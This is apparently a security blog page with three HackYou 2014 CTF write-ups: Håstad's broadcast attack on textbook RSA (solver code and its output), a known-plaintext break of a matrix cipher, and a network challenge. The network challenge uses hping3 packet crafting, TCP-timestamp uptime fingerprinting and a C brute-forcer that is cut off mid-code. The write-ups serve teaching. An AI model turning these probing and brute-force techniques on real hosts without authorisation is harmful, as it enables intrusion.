codezen.fr code hacking, zen coding

16Jan/14Off

HackYou 2014 – Crypto 400 – CRYPTONET

Posted by aXs

We have intercepted communication in a private network.
It is used a strange protocol based on RSA cryptosystem.

Can you still prove that it is not secure enough and get the flag?

We have a pcap files with multiples TCP sessions and a python script:

#!/usr/bin/python
import sys
import struct
import zlib
import socket

class Client:
  def __init__(self, ip):
    #init
    self.ip = ip
    self.port = 0x1337
    #connect
    self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.conn.connect((self.ip, self.port))
    #recieve e
    self.e = self.Recv()
    #recieve n
    self.n = self.Recv()
    self.e, self.n = int(self.e), int(self.n)

  def Recv(self):
    #unpack data
    length = struct.unpack('!H', self.conn.recv(2))
    data = zlib.decompress(self.conn.recv(length[0]))
    return data

  def Pack(self, data):
    #compress data
    data = zlib.compress('%s' % data)
    length = struct.pack('!H', len(data))
    return '%s%s' % (length, data)

  def Send(self, msg):
    #send message
    msg = int(msg.encode('hex'),16)
    assert(msg < self.n)
    msg = pow(msg, self.e, self.n)
    self.conn.send(self.Pack(msg))
    print '[+] Message send'

  def __del__(self):
    #close connection
    self.conn.close()

if len(sys.argv) != 2:
  print 'Usage: %s <ip>' % sys.argv[0]
  sys.exit(0)

flag = open('message.txt').readline()
test = Client(sys.argv[1])
test.Send(flag)

This is Textbook RSA and the tcp sessions are the same message being broadcasted by Alice to many Bobs, each Bob using a different public key (N)

This a classic example of the Håstad's Broadcast Attack on RSA.

Solution reusing parts of Christoph Egger's RuCTFe nsaless service write-up:

from struct import pack,unpack
import zlib
import gmpy

def my_parse_number(number):
    string = "%x" % number
    #if len(string) != 64:
    #    return ""
    erg = []
    while string != '':
        erg = erg + [chr(int(string[:2], 16))]
        string = string[2:]
    return ''.join(erg)

def extended_gcd(a, b):
    x,y = 0, 1
    lastx, lasty = 1, 0

    while b:
        a, (q, b) = b, divmod(a,b)
        x, lastx = lastx-q*x, x
        y, lasty = lasty-q*y, y

    return (lastx, lasty, a)

def chinese_remainder_theorem(items):
  N = 1
  for a, n in items:
    N *= n

  result = 0
  for a, n in items:
    m = N/n
    r, s, d = extended_gcd(n, m)
    if d != 1:
      raise "Input not pairwise co-prime"
    result += a*s*m

  return result % N, N

sessions = [
    ['192.168.001.005.33023','192.168.001.017.04919'],
    ['192.168.001.005.34806','192.168.001.021.04919'],
    ['192.168.001.005.35157','192.168.001.024.04919'],
    ['192.168.001.005.35915','192.168.001.027.04919'],
    ['192.168.001.005.37126','192.168.001.023.04919'],
    ['192.168.001.005.37754','192.168.001.020.04919'],
    ['192.168.001.005.39425','192.168.001.025.04919'],
    ['192.168.001.005.40439','192.168.001.011.04919'],
    ['192.168.001.005.41260','192.168.001.010.04919'],
    ['192.168.001.005.42465','192.168.001.028.04919'],
    ['192.168.001.005.42767','192.168.001.019.04919'],
    ['192.168.001.005.51710','192.168.001.018.04919'],
    ['192.168.001.005.52037','192.168.001.016.04919'],
    ['192.168.001.005.53328','192.168.001.012.04919'],
    ['192.168.001.005.54629','192.168.001.022.04919'],
    ['192.168.001.005.56537','192.168.001.015.04919'],
    ['192.168.001.005.56717','192.168.001.014.04919'],
    ['192.168.001.005.57646','192.168.001.013.04919'],
    ['192.168.001.005.59891','192.168.001.026.04919'],
]

data = []

for session in sessions:
    (source, destination) = session
    print source, destination
    message = open(source + "-" + destination, "rb").read()
    handshake = open(destination + "-" + source, "rb").read()

    buff = handshake

    length = unpack('!H', buff[0:2])[0]
    try:
        e = int(zlib.decompress(buff[2:2+length]))
        print "e=", e
    except:
        print "Zlib error for e"

    buff = buff[2+length:]

    length = unpack('!H', buff[0:2])[0]
    try:
        n = int(zlib.decompress(buff[2:2+length]))
        print "n=", n
    except:
        print "Zlib error for n"

    buff = message

    length = unpack('!H', buff[0:2])[0]
    try:
        msg = int(zlib.decompress(buff[2:2+length]))
        print "msg=", msg
    except:
        print "Zlib error for msg"

    data = data + [(msg, n)]

    print "-" * 80

print "Please wait, performing CRT"
x, n = chinese_remainder_theorem(data)
realnum = gmpy.mpz(x).root(e)[0].digits()
print my_parse_number(int(realnum))

Output:

$ python crypto400.py
192.168.001.005.33023 192.168.001.017.04919
e= 17
n= 25492165341402870943193342194243878583550091830588300179983190484677536677783878770091771426745020581968485223806403482688708690916599646206863308796421682192123291604607235755107364431209342465647517951497018019170871611821471577647494718032136027446239385000016582048814012025961200909864909126220898470337474181564969111740549293849528764155308076160637626891491670481790680054394999454113154731685789729310781453533838696397873008408145290785550608424077599753426457559997966726766077860415133627965054965186926286998932683118114065698789972581403018027054849591593302510627959868541308908688742433116746685957413
msg= 6666419060534882063445608631701254352058920974421822069727027885698959797948070412066328188514278918986722361742912500893728424745043197562231410354633167915385978833339701529722766937863212423943888214894271923064950171580353934178748023608466389268996754295631668202047874774966518214639701079489902676101992190471567121772228753020078695924075081945558620706927179092603126041395606016633822502612954885417984184184737630487502072507997213412593690188577996870365218951232207636278621674542750965270226225337180320970384418820119666789283194398074172939976925377054214851752639573115850958399373724855553234690869
--------------------------------------------------------------------------------
192.168.001.005.34806 192.168.001.021.04919
e= 17
n= 21127940129465859529449290710465142401626099761120448822896227957140612250511186166751154941578458258054285578274511450860570540828102070111370941358023009904308008795394643585864471986075987747216086746123427597776886622933600026324537947907678164739969468650427560672262831484437166952755098875024996456298734488381416586155715216067643259554486571154930556222002298362539331180176023831109425436177078457326927485711697356496728959762158514131974253928871967648747022232011642161107225163919743383709749413596786170516661129884422397760268997322898954161891328103774133077184028190158020665184081778231669390621447
msg= 3025342965063970983290961997148038673244905555308289391392896371605967574831912573039170667272658109340534212720805676884032065407092138739865486740854024452063900964324730683963944994250537553102328024132087660954040726648939149676030355851576763910670469390583200661923104138267998714166483656478619852365437776250801008285867722681155855008497404084448836122553221951674607943082229713841396761939215145379881979676835537964953725808825354819362797503568722134701601966504482232887162578922823026182148541889898696868501626860530484834082878781257554947276873624962134091380186322272011345017295000538738940807566
--------------------------------------------------------------------------------
192.168.001.005.35157 192.168.001.024.04919
e= 17
n= 22563350736629808264395772922819808510705484822245634475903533464108273973359621048788502042378085143059458230242646589967392945320090987067961491654357416853755261074531634683509015394347409817614889849143844247148479574777870355411207636748917532445668322051861338052906797819332259215278552079454184458015646487703430124222965707626399501332317111449272813630361908462924849723439803107908568327484445685641242797481816740336203447956828486867818411976997494338407256234593013250778655132122780432402623365698921928370817670245911505312288465537126236680323692662919137486755722237256218345361985595174086335811073
msg= 20135971165126329834498721501784512951499984648652660104821647741072871489936836442504197592142991669369919035304425516258391511301425226375564892415339365148509645261565560913559856659645387805198871549146172257882053281268795760344994001608956789940307816388486468042693545041073838774812997395437209060397149458050765177205158052575861667488415782153713633691372314235926019032628836133660245109281683465499593548858659962576728675714563027957143405441096816687188373864658407934159173393698714390810577718268693096568336071207238450039773940104963444157704166286892082172461258702049072827677476706096904316460964
--------------------------------------------------------------------------------
192.168.001.005.35915 192.168.001.027.04919
e= 17
n= 19697677554331221267369641184167188448335213481430897452143918418367154993523756864868509098839783053011355139590418269119504715550443490754762988015861768839038067134509092125205376509678043881070558825637905431885254727168679069330416776166369184375970521838169214107508952264240335498312849019213361951991190975616614804433716772411184993774461040690673753098373736933084616647869336141707774024488317582512216162403209135110515778522772939206567850540704356683976987508523230996026019768603629874558741038975853009975048175519392495212857366577161641687502674304846608725983145033337187267988999492371626182417551
msg= 14300174742950957133230867352717457897986205104543265825218842008467109972830138620119291505539500355334723376879888409251809364632635010202950500050892997355318105884900306620239365641681252935777362167024611054220484107153146560621083009306565476636270883588514007454668850327310521718849400741849368048026759782889674614052640379573508042637071620721869972662416840328750772187247907576009995766111841008793044576343182936834713229276992314777759684829492003814595802694592792453101320053268786720734738162720052909591108493186651733642823133001888727983206566194875945734575411295063088173363528901413605439659186
--------------------------------------------------------------------------------
192.168.001.005.37126 192.168.001.023.04919
e= 17
n= 22840174333461757597258965063503187552495604936013453813620970124752854692025931772152482715744058240571638175460349150353012889988723597821978579743499713766809084692254297539180932689148176677208822562008650864838388158004011554059006621226560748426334342736035675518932164604927602370423087532589029111052023317750367568915149473019058579728528211621618516222534404936592529521724927756742450435643292165615017136698859157488474841102297647488008004924900405006989945846311096537399030509947027554824768198503677139485403433484337602107191422279674605462427176871354240310242684337649527314815937448142118014471869
msg= 7269879938285087105060326068602691458154834670489063661854932312114567012381462325708324462473335735747751985833951832304054546004436096189761282474552769255043106817537407079708725883409397856635437608590617899532129476884853580275762892523609169600551500977086971018619327642914168273376084417345670925345416864822282780628646416374712921155883117431305185117831110048721693951865267141962666069350614792416053836803149161735632213430960384988586996269807413280397202373128437527421378900814241234271529460443131737298476049472736692048979564047934967259654010923397531158463241672904787724046355796318156683211693
--------------------------------------------------------------------------------
192.168.001.005.37754 192.168.001.020.04919
e= 17
n= 26181530231990596208912553982832841408036769882768643576772592303571004331051012292548525104394717484252349998434031623438917061404178468743247357634872314865905132523154238118481540371615056806756673945897771283881615017345596477766231957968854622033499073650939380455320632540323169565251694316300843433445667057555206872698949047971459662093473609973167299463621536822302820363096764742010575821082948519766535657152613824870739004432505303862201505469354785224205708777422229564239113870271947768783809029625932248575272642464554827073657622048405963388795704112995209429712517330431946725366254154641804680636843
msg= 6596498503473090384156122948918457693225694527543771961484972133896304927525029433085731957072789891646290597692421323936231128201822432631159176346646447011338805190482179145913035869942714613486895588754112366313438192851954663748505238329830016450238817308208066971617432717047936473721490905750275563930145038394216747562079905090073621918898708464447477835510214346908545028865672847041949340101722558962541612836311085196500521238354347015877914823677634283521373575663416167402249149782097385550791425270622816978948552969790013217066937461634555711434991830871731594480554761087920979267051612013063691897091
--------------------------------------------------------------------------------
192.168.001.005.39425 192.168.001.025.04919
e= 17
n= 18375116136153390105382127878395045588105857107246922094470216545244337357987681718168448429849698069981688291927806366721855289976121993055091218569849787514394507275481429728206429948836923251296672175100798033529862498578044854162615314211321712132747044363074981129056925717085204066189560133707352709019771792017200539059204024262019592851381317279368957556414371834469907989489823310736060223258994989400405121984031058976855896631117913090748375198718936570595983429517914008170697730495897896134771484309035561040862223201385431761693343426402858632921946359721016131084165400212811848077899966364178485645209
msg= 14450411368079644952604705871870024872670263251365527266862703716230778731191117713744962010138824834514424908701300856449356388617430510950535877723758382120583446269291649779277478125202353436896123871466945681583403794725306243733343462009791759823657466902546992816090954580754519785729524996046358307197773786618439603452776474869740548426942373102466687002398105444228516302695737600836706505822006007382861266883167162032588362091247091029707841718663522787461434574458986841049123553142254769053444081497788062775004085437066317446657655214417638414799100287660747244854718117257942197065271633812453504802118
--------------------------------------------------------------------------------
192.168.001.005.40439 192.168.001.011.04919
e= 17
n= 18856599160001833299560082802925753595735945621023660831294740454109973698430284916320395522883536507135735383517926050963512440162483065097256884040938259092582892259657340825971260278387406398529168309426241530551396056450450728728601248269612166083300938497235910244979946020059799495231539400114422748104072550004260736766137354572252872437140063474603268146956570787143010441293268321641092743010805639953103578977668248726500636191043930770036787317928372179939360510179438436665591755940224156131460271763912868322774604558314812111335691108887319827579162188169744014973478052491398688611046800951698773893393
msg= 9537600333774561965347809713893729543607050845183365456822389928272539309054686047543168922742589173859871008938711574330675462024831693796734766356934966684018899382045308313458440052017835494802986355673813464215184924837019853399388984893499187144821922554214143314640377079505897680854314880035458832414257859211958802973880776732222536460326269825765449639225220135735729106020282618914111685220841901015367575108920943148006106714487046602965253293770388951872741849791157534395777330833976209975828865170184061768114280467192574451716204110866562270737220078456700440400847759035001437357717203367869014507886
--------------------------------------------------------------------------------
192.168.001.005.41260 192.168.001.010.04919
e= 17
n= 27658060678038715780470429570597987144542213875178081185638364125349217264266787337266356239252353691015124430930507236433817624156361120645134956689683794554169169254645287613480048966030722812191823753459580311585866523664171185580520752591976764843551787247552790540802105791272457516072210641470817920157370947681970410336005860197552073763981521526496955541778866864446616347452950889748333309771690509856724643918258831575902389005661750464296924818808365029037591660424882588976607197196824985084365272217072807601787578262208488572448451271800547820717066767396857464594301327160705353075064322975430897551911
msg= 11433488612991990768536086698965180146550356348457563234735402111134701115830423042016221831657484325065472609147436229496479358788735270448637824809543880271526735635196884978639585020518147152207002685868984199742884443523231593245377292570809368330956970290791633106067116466080014631110596564728982066569618319541351401820732547227122970369299780366876340403436785218211729531092484723580223801525992510782266856454394478372421830988205823368541860973674259795969870252832216828042174346473447490557323038031625277043161510854825069681462499200978561823301487118145650943076528233694749306585201212677836363102350
--------------------------------------------------------------------------------
192.168.001.005.42465 192.168.001.028.04919
e= 17
n= 22946690762018202432990887189358840679847544298138130593179782494313283235656708793278294817370704179431587028797820098265221065047094111469387707851755805572030960917620048531944164128853858185996116085402185608208505862268300069081634690281361741089802822427014733500818400628218120217701065238981427409232531524810373504821405505784194458324112411450898914981925380408035843501140943840375415504531028291728110941191868468403264579853022847273710668909241386840084506302813524686512443804790681324357699954553042087787664048340322301999798211625015533291431249576149925507273846582715275085720997988716732564925247
msg= 22114155655659890875804525321139229042160702983880183010190613534988342335473532979092956071940843014846115113869717993343361412775761899123003515398037548495421246487341345482541093940292149812612966738017954607042366694074210348507360409383994155996445275183175086308877643260816760841714256410898269814908129813108551478627448054932601176813323889809069498060147451905095827442175810001123067159848367040168783825044279052630935945891964134230385303127654483691228319146427451587693985548002268250053416426728753739573823133295951972853182187229046285977320129680613905801285437766686995325893960172376926445625122
--------------------------------------------------------------------------------
192.168.001.005.42767 192.168.001.019.04919
e= 17
n= 24196427886175544349183151853220199349004334700026598710073455177858086301574503667298550711896472441115488666905450709605686892168468755356865839253905196330957826522203721667534054840325504585224175556167326100374628995111103938603447308160978852917872087343333848311844292367100647648063686677699135973596041567307784602998888789211145238333237613511049640509935260207585999606022736214748154785163367146044878537220691272581381812904389596150391959046627047758159235384420979630615278721284429066540058110867810807414175942667916940934372027878979861244401198531405584211810881235860988295519048177492135610751359
msg= 22296229997452473240404864600165019763565238056149885081619043661295445875270023158334098350603026725837611396891344057244652143898149482532106315521575872089742565470821567522946361662445964027209388657746191967435348044945947483621482721538186361050633595041353278781238956486769506373730884495108039610798833232749139421109269053404110580969203157360738738757856465985684697862079893042321411866940484105462672034009048091117594209570962168395344960105313171255329582011213721766675322731331965794652525786585751148977132545042466983433106614477836969990881581169493890539450115893703987635774477858244270608426284
--------------------------------------------------------------------------------
192.168.001.005.51710 192.168.001.018.04919
e= 17
n= 24360507764722702236982664735328841420311376027120399241078325497875531961885056309904114723678048613901842270612025644417215018351512175660269184968149109110209563435463873211914594529847294730496535258882010197028842516927468678843924092706088182566726725380495130934316582041447010080540555792802432876873205758297773353354773400601269072565235285553745651262991130015382601486699000167692446155692416347390954126585612460075052988874628884097103408004610717498543307677173210168954439627061348158046928463114067813191846253937179490050784167037265795606665046543869952157800016132040847485597002954075447344679099
msg= 2091608690891505258645949208946395204695041893228619053197065370886625848151228416356718762070352835427065857428605476603762875777761221509564315249418937215791628816353819422446178413024109351330646491084678357651148045128554746141683169277567849074245394149157710582616155738686711539953583528181614701953172972027101545253676978964454897005216320952879719740377602813279137554307680715749682175447559417772077472349519490785782899751615833622828868651966927604858524345638792811839384317780948838203430577334783095834911402913673850996431719159112716370014509918436690080118494876223156361387987999829094801210890
--------------------------------------------------------------------------------
192.168.001.005.52037 192.168.001.016.04919
e= 17
n= 20991361604317638769781823650579915779070848318189821239839863416933546421097820271887796260918963289144354691357223973152195364244222103627141268032857145421152363842224398828703305592221616019678102879125957325674007444034541160527072712208844228077449624475289619712846717432293230773279322231288635231839457560272849165524911202814516841260722542666841002263011069065414760944278124011800036869640840312097012211808948108758865722731922057521488153991477824974687229720412552981052793827211890557079895492457992364345889589127536307112174252490433421772585442393590767593690124636778449673348970938028847369589017
msg= 1176089662945377859394485590647428302230902074038834532187683920441006896963622996580792552532208518328678256998366963208028743204946660302538358531574765644007432906847438011315702121691613005078019506672007476291213237939507650616659336489497035998458925997634519034425449883103272960672562772204663037400144823802245320606039938019714906919958257594477982151857672916895153818922550365638890064326384677879791487276278839159022778493427572161764299809764447703117493013786755368150005501909964140795978310287946809348754988288402304994584145696550845106776916203635572397815715801968943287729470010695704992513284
--------------------------------------------------------------------------------
192.168.001.005.53328 192.168.001.012.04919
e= 17
n= 23536517244565831304957548822169291652207666754083340160306298208076886665065064843803465469409961704414510544566548897045751559184520942970858445270483458341528037499088946028024476760938334724064432942414803725235245083424464022066205458380170453189950900307248048617678876232312945996520402058770976469558803007764420552804210174247648614671097046399148333316029580244153775977135880775921663886951776404864678251750085264792097984094013284691977749495264267344834078278955171634785277609298558886471141768976455150174601039402280137908104589898954351484608783306378026577123527889651575952772820003380025546341093
msg= 2787570158312133794000264568955228362505478580337508384369847495327630702109418180218855630800765419691714135680571469213835542379448821209732447589306506369895651911135089075762137873889141680195343215032414145506957429427948190720862478335515596644926205381293106417410261520242246013085300698437878525197927303400003852408888917470597700285690342597850461091636279688711415205788329646890595805415907084665612141657880165938739423616058100283432682214722969192114128403177592988697839575450529126584549296274365360257579336454484779207708578834457262472129009056129647722165160424055970728939468425924742795247404
--------------------------------------------------------------------------------
192.168.001.005.54629 192.168.001.022.04919
e= 17
n= 22418240669078782395650685709211154715963189697089263104799144782938556049238670824036504767273510569815649054522706833230147726835488621722481390416868271627116267103118088021697808807092496788890564153300558617457948161343658932652189856049810225397121264480931341652674373238956664385611007077903271999938666531870525476577337484325119704138317723687164049779101614572637615019989722168840820998326371954897496744184510021746784303032310300111064058399012572181069622479162656626630666689745901678446100898000876596201969536772169761074060718581442841244466714693693744538078059538322489346225247976911833748299831
msg= 12741916458848035965674277226994440579915129055105462698845221890770558867890065973150125863687106455321192524282688850919026924493363241183706112792662939894532011809709158105688708409813198696055548036573709488504352009446189240170056000380659861236761237694775468132858916502459186242385986053427650331045218524574666652583364331482577973877822911369427036861116411565934292335204172142173748941863013032301778764886328258476195697934305418334527182261876183838908107190767800857337092015153451318295610430683371731834190637342265695335154669307530426675001781782217407160875559782488264585128426108095378548497650
--------------------------------------------------------------------------------
192.168.001.005.56537 192.168.001.015.04919
e= 17
n= 23980852037830754961843810384842109198680213599160124627608485316452067979221814287579031744661623974638029208789156178351485676131492416093947908129410491693261731404401473508295054358751129977958761373804386612048163148740071525591509234298601816819182717519183021983010112798883286143566969631969002952806398266165159329990930567027893909276078886841121244401773915309649928992691723658667402744292184927500507621943557420540056270730461740897601661594495028880708798531876866777269713984635553934853524715534003465120928659881608776745499441872048908380726942161563974610455635903901327036597201663594811207962219
msg= 6500753041357449855790208700753809194331642408448330624975108109751859721113916040913210608530117147284032825775613945416295553599499663257233673509345038912634968979540222246220460441613513695959331196716737175735741187191935319073270722811433035516074289343637773607521789970734447289501012767670625043452129332667983332570596510412510389935486708833483704894688513193020406791505432203906745860054901025547265075193156070642716676601268698224891768784422675343094235950805128869705790800102590177489342374151286188584127528879203511712056047898651580309669143955726928687269246843562481439718815596302692298516533
--------------------------------------------------------------------------------
192.168.001.005.56717 192.168.001.014.04919
e= 17
n= 20692935323456318857339636506121661409781600706918188791579569287363925379425076174758120076604134447812506062875425652061813752876711066070389233324351070782264123950482732919402628782987702034544299244918439112034234610691454353578647793100554890386226509128280993176780063155185886470116528236906519407444238424523493151082789442134440461004320839591569157239343299865825958454617581990948186838151424941117137818356712476559230872711658730923799079308488965817006179693410669320825141974869847267757553830878658559853061666130127729833856270147578804267991192625989184535593836836877723580138193263333297569871679
msg= 3149880252209031344712912478150309339789690396685866282400905925814536568350616764434288908486968492252351255022161340923513529850192573780350157980373627989388396346845656970516353356298790654832486310492079962338672745285854665147406015543850517102001543987674241995267846019477920439984122318278402925428057397039652213642437095694526592410641576952281061504190238132151689288080423425867830015832927809704559212420233819682781217618789216812964682441589327621971863380979777355679805008775337364919278947618188598427198109821307637144473819840409743353235834034795849314936322245339378447572244022235758755318197
--------------------------------------------------------------------------------
192.168.001.005.57646 192.168.001.013.04919
e= 17
n= 22182114562385985868993176463839749402849876738564142471647983947408274900941377521795379832791801082248237432130658027011388009638587979450937703029168222842849801985646044116463703409531938580410511097238939431284352109949200312466658018635489121157805030775386698514705824737070792739967925773549468095396944503293347398507980924747059180705269064441084577177316227162712249300900490014519213102070911105044792363935553422311683947941027846793608299170467483012199132849683112640658915359398437290872795783350944147546342693285520002760411554647284259473777888584007026980376463757296179071968120796742375210877789
msg= 16279989825796156802547712583633798298339885806436476356497796047229021124610630851145390462136716298450342674217575569196543919171078736243934669612002081179432014315465408489156509075853163302037413161239227506465361288161349464334942343016752593577869091378915378775289174914088843177811858916838452126433042585745992994815140378356718198629815818784659700720051966660786554920296721138381405607252098516473395177368859057746002895683463397630717358844874557866924382768279446164993249061647243362602307728771126094369384362246840728274885512559106673543101063171808938427459691773785819336680808200730383909434687
--------------------------------------------------------------------------------
192.168.001.005.59891 192.168.001.026.04919
e= 17
n= 21996468204721630460566169654781925102402634427772676287751800587544894952838038401189546149401344752771866376882226876072201426041697882026653772987648569053238451992877808811034545463363146057879646485465730317977739706776287970278094261290398668538232727000322458605289913900919015380904209692398479885177984131014170652915222062267448446642158394150657058846328033404309210836219241651882903083719822769947131283541299760283547938795574020478852839044803553093825730447126796668238131579735916546235889726257184058908852902241422169929720898025622336508382492878690496154797198800699611812166851455110635853297883
msg= 18919626944919001746434424216626233185707755539125451453498872012547818089480281584466165481221804279035723497497262166426771134459922980759121024951390547522550510734782168869364945944106404378597344695227319394862905382593128694330512816879360904284025740295670026092938765777154761403682710878968080966485091090198109371223563090698724814081281842426885356314840392128767155541449360105460941384985904101420698734690361896580259169275867969219822351776569430617405034594385605780084981880407657528516176335362438505224655581522137130777263875034088903829280901936110414932437809315770012018024957989707333743935907
--------------------------------------------------------------------------------
Please wait, performing CRT
Secret message! CTF{336b2196a2932c399c0340bc41cd362d}
Share
Tagged as: , , Comments Off
16Jan/14Off

HackYou 2014 – Crypto 300 – Do you like math? Write-up

Posted by aXs

Do you like math?

We have an encrypted flag.wmv.out file and this python script:

#!/usr/bin/python
import random
from struct import pack

def Str2matrix(s):
  #convert string to 4x4 matrix
  return [map(lambda x : ord(x), list(s[i:i+4])) for i in xrange(0, len(s), 4)]

def Matrix2str(m):
  #convert matrix to string
  return ''.join(map(lambda x : ''.join(map(lambda y : pack('!H', y), x)), m))

def Generate(password):
  #generate key matrix
  random.seed(password)
  return [[random.randint(0,64) for i in xrange(4)] for j in xrange(4)]

def Multiply(A,B):
  #multiply two 4x4 matrix
  C = [[0 for i in xrange(4)] for j in xrange(4)]
  for i in xrange(4):
    for j in xrange(4):
      for k in xrange(4):
        C[i][j] += A[i][k] * B[k][j]
  return C

def Encrypt(fname):
  #encrypt file
  key = Generate('')
  data = open(fname, 'rb').read()
  length = pack('!I', len(data))
  while len(data) % 16 != 0:
    data += '\x00'
  out = open(fname + '.out', 'wb')
  out.write(length)
  for i in xrange(0, len(data), 16):
    cipher = Multiply(Str2matrix(data[i:i+16]), key)
    out.write(Matrix2str(cipher))
  out.close()

Encrypt('flag.wmv')

To solve this challenge, analyzing the WMV file type is important.

The header of a WMV (ASF container actually) starts with a well-know 16 bytes sequence: the header GUID

So we know 16 bytes of plaintext and 16 bytes of corresponding ciphertext : that's enough to calculate the key

C = K * X
K = X-1 * C
P = K-1 * C

Here is a script automating this:

#!/usr/bin/python
from struct import pack,unpack
from numpy.linalg import inv

def Str2matrix(s):
    #convert string to 4x4 matrix
    return [map(lambda x: ord(x), list(s[i:i + 4])) for i in xrange(0, len(s), 4)]

def Words2matrix(s):
    #convert words to 4x4 matrix
    return [map(lambda x: x, list(s[i:i + 4])) for i in xrange(0, len(s), 4)]

def Matrix2str(m):
    #convert matrix to string
    return ''.join(map(lambda x: ''.join(map(lambda y: pack('!B', (y+0.05) % 256), x)), m))

def Multiply(A, B):
    #multiply two 4x4 matrix
    C = [[0 for i in xrange(4)] for j in xrange(4)]
    for i in xrange(4):
        for j in xrange(4):
            for k in xrange(4):
                C[i][j] += A[i][k] * B[k][j]
    return C

def to_words(string):
    i=0
    data = []
    while i<len(string):
      h = string[i:i+2]
      data.append(unpack('!H', h)[0])
      i+=2
    return data

def Decrypt(fname):
    data = open(fname, 'rb').read()

    # WMV GUID header
    plain = Str2matrix("30 26 b2 75 8e 66 cf 11  a6 d9 00 aa 00 62 ce 6c".replace(" ", "").decode("hex"))
    cipher = Words2matrix(to_words(data[4:4 + 32]))

    inv_plain = inv(plain)
    print "inv plain=", repr(inv_plain)

    key = Multiply(inv_plain, cipher)
    print "key=", repr(key)

    inv_key = inv(key)
    print "inv_key=", repr(inv_key)

    out = open('flag.wmv', 'wb')
    for i in xrange(4, len(data) - 4, 32):
        cipher = Words2matrix(to_words(data[i:i + 32]))
        print "cipher=", repr(cipher)
        plain = Multiply(cipher, inv_key)
        print "plain=", repr(plain)
        out.write(Matrix2str(plain))
    out.close()

Decrypt('flag.wmv.out')
Share
Tagged as: , Comments Off
15Jan/14Off

Hackyou 2014 – Net400 – gsmd.sh Write-up

Posted by aXs

Welcome to Microsoft Security Assessment Lab.
As far as we are concerned, you are once again applying for an information security job at our vacancy.
Our policy has changed. We're not making our products secure anymore — we're now providing bugs to NSA.
They have run out of their CYCLONE Hx9's GSM station emulators and had to switch to using real base stations for now.

As your test assignment, you are to take over the base station at
77.220.186.142:40000

Debug console: gsmd.sh

This challenge gives us a broken basestation firmware. We need to retrieve the file /home/flag.txt. The broken shell script has a vulnerability like this:

    echo -n "Auth token > "
    read token
    if [ "`gsmd_auth_check $token`" == 'AUTHED' ]; then
      ok=1
    fi

    filename=/home/flag.txt
   
    echo "Attempting to read arbitrary file"
    echo === $filename ===
   
    if [ $ok == 1 ]; then
      cat "$filename"
    fi

The check relies on a global "ok" variable and this variable is not initialized before starting the authentication check. If we can set it to ok=1 somewhere else in the script, we will get the flag.

Somewhere in the script is actually here:

      RND=$(dmesg | tail -100 | egrep -i '[^a-f0-9].[^\s\S]f' | egrep -B4 '\b[A-Z][^A-C][A-Z].\s\w' | rev | grep musk | rev | egrep -A7 $'\x3A\x20\x2E\x2E\x2E\x20' | egrep -w `echo -n GPRS | md5sum | head -c3` | tail -1)

      if [ "$RND" == '' ]; then
        echo "Nothing random happened in a while :-("
        exit -1
      fi
     
      challenge=`echo "$RND" | sha1sum`
      echo Challenge: $challenge
     
      echo -n "Response > "
      read response
     
      if [ "$response" == "`echo "$RND" | sha512sum`" ]; then
        ok=1
      fi

Basically, this function will search for "bad checksum" message in dmesg, take the last one and compute the sha1 of the string. To authenticate we need to send the sha512 of the same string.

Here is a sample dmesg entry that would qualify:

[6547042.852817] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8

We can generate them with the hping tools easily:

$ sudo hping3 77.220.186.142 -c 10 -2 -s 1337 -p 40000 -k -b

We notice this line begin with the host uptime in the [seconds.nanoseconds] format. So we need to send a few broken UDP packets to the host to fill some lines in dmesg and then we need to guess the host's uptime. Using the host uptime, we can construct a string that will be exactly like the one in dmesg and compute the sha512.

This is a Network challenge so we will use TCP Timestamps to guess the host's uptime.

Hping to the rescue, we send 2 TCP packets 10 seconds apart with the TCP timestamps option set:

$ sudo hping3 --tcp-timestamp -S 77.220.186.142 -p 40000 -c 1; sleep 10; sudo hping3 --tcp-timestamp -S 77.220.186.142 -p 40000 -c 1
HPING 77.220.186.142 (eth0 77.220.186.142): S set, 40 headers + 0 data bytes
len=56 ip=77.220.186.142 ttl=56 DF id=0 sport=40000 flags=SA seq=0 win=14480 rtt=52.7 ms
  TCP timestamp: tcpts=1636688922

--- 77.220.186.142 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 52.7/52.7/52.7 ms
HPING 77.220.186.142 (eth0 77.220.186.142): S set, 40 headers + 0 data bytes
len=56 ip=77.220.186.142 ttl=56 DF id=0 sport=40000 flags=SA seq=0 win=14480 rtt=52.7 ms
  TCP timestamp: tcpts=1636691457

--- 77.220.186.142 hping statistic ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 52.7/52.7/52.7 ms

We compute the timer frequency and the uptime in seconds:

$ python
>>> 1636691457 - 1636688922
2535
>>> 2535/10
253
>>> 1636691457/250
6546765

The kernel is running a timer at 250Hz for tcp timestamps and we know the approximate uptime is 6546765 seconds.

We can now brute-force until we find a string that match exactly the SHA1 given by the challenge host using a custom C program:

#include <sys/types.h>
#include <sys/uio.h>
#include <openssl/sha.h>

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <math.h>

#define SHA1_DIGEST_LENGTH 20
#define LOG "[%i.%0.6i] UDP: bad checksum. From 94.23.141.246:1337 to 77.220.186.142:40000 ulen 8\n"

char *byte_to_hex(unsigned char *buffer)
{
  static char hex[SHA1_DIGEST_LENGTH * 2];
  int c;

  for(c=0 ; c < SHA1_DIGEST_LENGTH ; c++)
    sprintf(hex + c*2, "%.2x", buffer[c]);

  return hex;
}

void hex_to_byte(unsigned char *buffer, unsigned char *digest)
{
  int c;
  unsigned char number[3];

  for(c=0 ; c < (SHA1_DIGEST_LENGTH << 1) ; c += 2)
  {
    memcpy(number, buffer + c, 2);
    number[2] = 0;
    sscanf(number, "%x", &digest[c >> 1]);
  }
}

int main(int argc, char *argv[])
{
  FILE *f;

  unsigned int ts,hz;
  unsigned int uptime;
  int step = 1;
  unsigned int i;
  static unsigned char log[128];
  static unsigned int log_len;
  static unsigned char nano[1000000 * 8];

  static unsigned char guess_digest[SHA1_DIGEST_LENGTH];
  static unsigned char target_digest[SHA1_DIGEST_LENGTH];

  if (argc < 3) {
    printf("Missing arguments: %s <raw TS val> <frequency> <target SHA1 hash>\n", argv[0]);
    exit(1);
  }

  ts = atoi(argv[1]);
  hz = atoi(argv[2]);

  if (!ts || !hz) {
    printf("Invalid timestamp or frequency\n");
    exit(1);
  }

  uptime = ts / hz - 10 * 60;

  if (strlen(argv[3]) != 40) {
